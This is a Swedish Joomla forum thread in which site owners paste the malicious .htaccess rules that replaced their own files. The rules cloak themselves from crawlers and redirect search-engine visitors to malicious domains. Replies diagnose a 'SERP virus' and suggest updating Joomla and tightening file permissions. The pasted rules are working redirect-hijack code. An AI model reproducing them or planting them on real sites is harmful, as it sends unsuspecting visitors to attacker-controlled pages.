Hur kan .htaccess ändras "av sig själv"

Diskutera frågor rörande installation, backup, migrering och säkerhet avseende Joomla! 1.7 / Joomla! 1.6.
Locked
SwedEdit
Joomla! Intern
Joomla! Intern
Posts: 75
Joined: Mon Aug 15, 2011 5:09 pm

Hur kan .htaccess ändras "av sig själv"

Post by SwedEdit » Wed Feb 15, 2012 4:39 pm

Fick problem med en av mina sajter häromdagen. I princip inget fungerade utom index-sidan. Menyklick resulterade i att jag fick 404 på alla menylänkar.
Jag kör fortfarande 1.6.5 (ja, jag vet att jag borde uppgradera till 2.5!).

Min normala .htaccess fil innehåller det som en sådan fil normalt innehåller + ett antal 301 redirects.
Har kollat med webhotellet och det skall bara var jag (mitt IP-nummer) som varit och "ftp-at".

Någon har har i alla fall lyckats byta ut min fil till en med följande innehåll:



<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|[censored]\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*qKz.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.akitahusky.net/url?sa=t&source=web&cd=2&ved=0NmqR24Ob&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=25Mseq7I6a2zqI2OzlA4+pa1oQ==&usg=-tRU-YYqonXU8xmxK-4XRY&sig2=ZH8iC3aXAy2g9YKGRoLFIG [R=302,L,CO=qKz:25:%{HTTP_HOST}:9835:/:0:HttpOnly]
</IfModule>
#34eab213c50f4a92c18ab4fcf1d9e500fd0a75ca9b014cdbaecaae77



Denna text dök upp efter att jag i Wordpad scrollat och scrollat ner en hel massa på sidan. Efter ovanstående text var det en otrolig massa blanka rader igen.

Hur har det gått till??
Hur kan man skydda sig?
Börjar förstå Joomla nu, men det dyker ju alltid upp nya frågor.

Teqorious
Joomla! Apprentice
Joomla! Apprentice
Posts: 28
Joined: Sun Dec 21, 2008 1:37 pm

Re: Hur kan .htaccess ändras "av sig själv"

Post by Teqorious » Mon Aug 13, 2012 2:24 pm

Jag sitter med samma problem med flera av mina sidor.
Skriver man in adressen manuellt till sidan kan man komma in men när man söker i google på företaget och klickar där så kommer man bara tillbaka till googles startsida.

Mina .htaccess filer ser ut som nedan:

Jag har bytt ut .htaccess filerna men det kommer tillbaka hela tiden och man kommer inte in på sidan.
Finns det någon som har en lösning på detta?

"<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|[youtube]|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*) RewriteRule ^(.*)$ http://2013-register.ru/plastic?7 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://2013-register.ru/plastic?7 [R=301,L] </IfModule>..."

EE Photo
Joomla! Ace
Joomla! Ace
Posts: 1858
Joined: Mon Dec 14, 2009 4:17 pm

Re: Hur kan .htaccess ändras "av sig själv"

Post by EE Photo » Mon Aug 13, 2012 5:23 pm

Ja du kan ju börja med att uppdatera till en Joomla version som inte är full med säkerhetshål. Sen kan du också sätta rättigheterna på .htaccess filen till 644.
Besök gärna min webbplats: http://www.fotoforalla.se/

Teqorious
Joomla! Apprentice
Joomla! Apprentice
Posts: 28
Joined: Sun Dec 21, 2008 1:37 pm

Re: Hur kan .htaccess ändras "av sig själv"

Post by Teqorious » Mon Aug 13, 2012 6:36 pm

Hej,

Tack för svar EE Photo, kollade en extra gång på det du nämnde...

På en av sidorna har jag Joomla ver. 2.5.6 och har rättigheterna 644 på .htaccess men det vill inte fungera tyvärr.

Fler ideer och lösningar välkomnas :)

User avatar
Per Yngve Berg
Joomla! Master
Joomla! Master
Posts: 30923
Joined: Mon Oct 27, 2008 9:27 pm
Location: Romerike, Norway

Re: Hur kan .htaccess ändras "av sig själv"

Post by Per Yngve Berg » Mon Aug 13, 2012 8:16 pm

Kör Forum Post Assistant http://forum.joomla.org/viewtopic.php?f=621&t=582860
så vi kan titta på konfigurationen till din server.

User avatar
Zello
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3869
Joined: Wed Jan 10, 2007 11:23 am
Location: Västerås - Sweden

Re: Hur kan .htaccess ändras "av sig själv"

Post by Zello » Tue Aug 14, 2012 8:44 am

Det låter helt klart som SERP-virus
Olle Zettergren
Freelance Senior Joomla developer
Moderator Swedish forum

SwedEdit
Joomla! Intern
Joomla! Intern
Posts: 75
Joined: Mon Aug 15, 2011 5:09 pm

Re: Hur kan .htaccess ändras "av sig själv"

Post by SwedEdit » Tue Aug 14, 2012 9:25 am

Zello wrote:Det låter helt klart som SERP-virus

Vad innebär det då?
Vad gör man åt det?

Sedan jag skapade tråden i februari har jag uppdaterat samtliga siter till 2.5.
Har trots det blivit drabbad ett par gånger.
Börjar förstå Joomla nu, men det dyker ju alltid upp nya frågor.

EE Photo
Joomla! Ace
Joomla! Ace
Posts: 1858
Joined: Mon Dec 14, 2009 4:17 pm

Re: Hur kan .htaccess ändras "av sig själv"

Post by EE Photo » Tue Aug 14, 2012 4:18 pm

Sökte runt lite på det här men hittar egentligen inget sätt att skydda sin htaccess fil på? Är det något särskilt man kan göra?
Besök gärna min webbplats: http://www.fotoforalla.se/

User avatar
Zello
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3869
Joined: Wed Jan 10, 2007 11:23 am
Location: Västerås - Sweden

Re: Hur kan .htaccess ändras "av sig själv"

Post by Zello » Tue Aug 14, 2012 6:36 pm

Ett steg åt det säkrare hållet är att sätta den till 444. Men har de tagit sig in på servern kan de ju göra i stort sätt vad de vill. Det viktiga är att hålla en säker miljö i allmänhet.
Olle Zettergren
Freelance Senior Joomla developer
Moderator Swedish forum

EE Photo
Joomla! Ace
Joomla! Ace
Posts: 1858
Joined: Mon Dec 14, 2009 4:17 pm

Re: Hur kan .htaccess ändras "av sig själv"

Post by EE Photo » Tue Aug 14, 2012 7:14 pm

Jo precis, vad jag kunde läsa mig till så verkar det som att de flesta får sin egna dator smittad av en trojan som sedan stjäl ditt FTP lösenord och på så sätt så får dom tillgång till din server.
Besök gärna min webbplats: http://www.fotoforalla.se/


Locked

Return to “Installation, backup och säkerhet”